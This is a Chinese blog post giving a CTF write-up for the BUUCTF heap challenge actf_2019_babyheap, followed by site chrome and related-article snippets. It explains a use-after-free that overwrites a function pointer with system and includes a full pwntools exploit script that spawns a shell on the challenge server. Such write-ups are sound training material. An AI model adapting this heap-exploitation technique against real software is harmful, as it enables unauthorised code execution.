BUUCTF-----actf_2019_babyheap (UAF)

最新推荐文章于 2024-04-22 15:10:57 发布
最新推荐文章于 2024-04-22 15:10:57 发布
阅读量6.1k 收藏
点赞数 1
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/117924556
版权

这道题和之前做的 hitcontraining_uaf 这道题类似

64位程序,没开PIE

在这里插入图片描述

在这里插入图片描述
并且这里发现了 bin/sh 字符串

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述

在这里插入图片描述ptr[v1] [1] 所存放的 printf_0函数内容为
在这里插入图片描述

利用思路:

ptr[v1]改写成bin/sh的地址,将ptr[i][1]处原先的print_content函数改成system,这样在执行show的时候就会执行system(‘/bin/sh’),就能够获取shell
在这里插入图片描述#!/usr/bin/env python

coding=utf-8

from pwn import *                                            

context(log_level = 'debug')                                 

                                                                            

r = remote("node3.buuoj.cn","26354")        

#r=process('./ACTF_2019_babyheap')

elf=ELF('./ACTF_2019_babyheap')                

                           

                                                             

def create(size,payload):                                    

    r.sendlineafter("Your choice: ",'1')                    

    r.sendlineafter("Please input size: \n",str(size))      

    r.sendafter("Please input content: \n",payload)         

                                                             

def delete(index):                                           

    r.sendlineafter("Your choice: ",'2')                    

    r.sendlineafter("Please input list index: \n",str(index)) 

                                                             

def printf(index):                                       

    r.sendlineafter("Your choice: ",'3')                    

    r.sendlineafter("Please input list index: \n",str(index)) 

                                                             

create(0x200,'index:0')                                      

create(0x200,'index:1')                                      

delete(0)                                                    

delete(1)                                                    

#gdb.attach(r)                                     

create(0x10,p64(0x602010) + p64(elf.symbols["system"]))      

printf(0)                                                

r.interactive()
半岛铁盒@
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
actf_2019_babyheap
z1r0的博客
02-16 671
actf_2019_babyheap 查看保护 这里有一个uaf。 这里的堆块还创建一个指向show的地址。 攻击思路: 因为有show的地址,还有uaf。所以可以通过uaf来修改show的地址为system_plt。创建两个0x31大小的堆,此时释放掉再申请两个0x21大小的堆,这个时候就是调用其余一个存放功能的堆块,再加上uaf的存在,将show功能的堆块改为system,将存放conext的功能改到binsh那里,此时调用另一个堆块就相当于调用system("/bin/sh"); from pw
actf_2019_message
kjdfklha的博客
08-26 300
BUU actf_2019_message double free/tcache dup
CTF练习-BUUCTF(1~25)
最新发布
04-22 747
BUUCTF练习 密码题1-25
[BUUCTF]PWN——gyctf_2020_document(UAF
mcmuyanga的博客
03-22 718
gyctf_2020_document 例行检查,64位程序,保护全开 漏洞在free chunk的时候 简单看一下其他几个功能函数 add() 像我这样的新手,可以申请几个chunk看一下,方便理清楚堆的内部情况 show(),根据存放在bss段的0x202060堆指针数组来输出对应的chunk里的值 edit() 利用思路 申请一个chunk,释放掉,在show,由于存在uaf,这样就泄露了libc 泄露libc后,由于第一个chunk被释放了,并且edit函数编辑的是chun
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1040
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6018
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
Jeopardy-Writeups:SniperOJ的CTF挑战比赛
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
PPJEmailPicker:UITextField替换以选择多个电子邮件
05-16
(PPJEmailPicker *) createAutoCompleteFieldWithFrame:( CGRect )frame{PPJEmailPicker * actf = [[PPJEmailPicker alloc ] initWithFrame: frame];actf. pickerDelegate = self;actf. possibleStrings = [...
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
学习matlab的基本使用例子,有矩阵运算,绘制曲线图等
Eclipse(中文语言包
11-26
• BabelLanguagePack-technology.actf-zh_3.5.0.v20101211082259.zip (7.39%) • BabelLanguagePack-technology.dltk-zh_3.5.0.v20101211082259.zip (59.44%) • BabelLanguagePack-technology.jwt-zh_3.5.0.v...
eclips3.7 汉化包
10-05
BabelLanguagePack-technology.actf-zh_3.7.0.v20110723043401.zip (4.46%) BabelLanguagePack-technology.bpel-zh_3.7.0.v20110723043401.zip (21.06%) BabelLanguagePack-technology.egit-zh_3.7.0.v...
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7153
BUUCTF题目Misc部分wp(持续更新)
BUUCTF Misc杂项前十二道题的思路和感悟
热门推荐
太阳照耀我走四方
08-18 1万+
title: BUUCTF Misc date: 2021年8月18日 17点27分 tags: MISC categories: MISC 1、BUUCTF 签到题 直接告诉了flag。 2、BUUCTF 第二题(Stegsolve) 下载附件之后,得到一个gif动图。 使用Stegsolve打开。 然后一张一张的向后翻, 得到flag{he11ohongke} 3、BUUCTF 二维码(QR Research、Ziperrllo、winhex) 下载附件之后是一个zip压缩包。 解压之后得到.
BUUCTF-逆向
weixin_52125240的博客
04-11 5334
BUUCTF-ReBUUCTF-逆向1.easyre2.reverse13.reverse2 BUUCTF-逆向 1.easyre 先用虚拟机看看是多少位的文件; 拖进IDA看看,一下子就出来了; 2.reverse1 先用虚拟机看看是多少位的文件; 打开IDA,查找字符串; 点击View->Open subviews->Strings 然后观察伪代码 所有的 ’ o ’全都变成 ’ 0 ‘ ; flag{hell0_w0rld} 3.reverse2 一样的看看文件是多少位的;
BUUCTF】Web题解
xuanyulevel6的博客
08-08 5014
BUUCTF】Web题解
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,
m0_73935461的博客
04-09 2061
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,首先我们先看一些图片的解题思路 图片类型:包含,图片该高宽,文件头损坏,图片隐写(内有压缩包),或者用kali的strings看一下图片内容在进行。可以在文件头中查看。上面标记着png图片,但是文件类型是pk(zip),像这种类型的文件一般是有问题的,我们就可以把这种文件到处去,在进行文件分析。
actf_2019_babystack
z1r0的博客
12-31 1305
actf_2019_babystack 查看保护 溢出0x10个字节,大小不够。栈迁移,s的地址都给了,将payload写入s,改ebp和ret为s地址和leave_ret即可。payload前加8个a让rip成功跳转到payload。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node
2017/2018-0ctf-babyheap-writeup
【xiaoxiaorenwu's blog】
04-07 755
因为最近2019届0ctf-tctf开始了,想去水一水,特别把2018的babyheap和2017的babyheap做了一下汲取一下经验,感觉两题类型相似,大致思路相同,2018比2017的利用条件更加苛刻一些。所以把两个题目放在一起来写,有助于加深对fastbin_attack的理解,和提高知识运用的灵活性。 首先提供两道题目的二进制文件:2017_0ctf_babyheap 2018...
0ctf Babyheap 2017
Bill
03-11 6358
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
buuctf ACTF2020 Include
09-16
根据提供的引用内容,buuctf ACTF2020的Include功能可能存在文件包含漏洞。通过将URL中的参数修改为"?file=php://filter/convert.base64-encode/resource=flag.php",可以尝试读取flag.php文件并将其内容以Base64编码形式返回。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值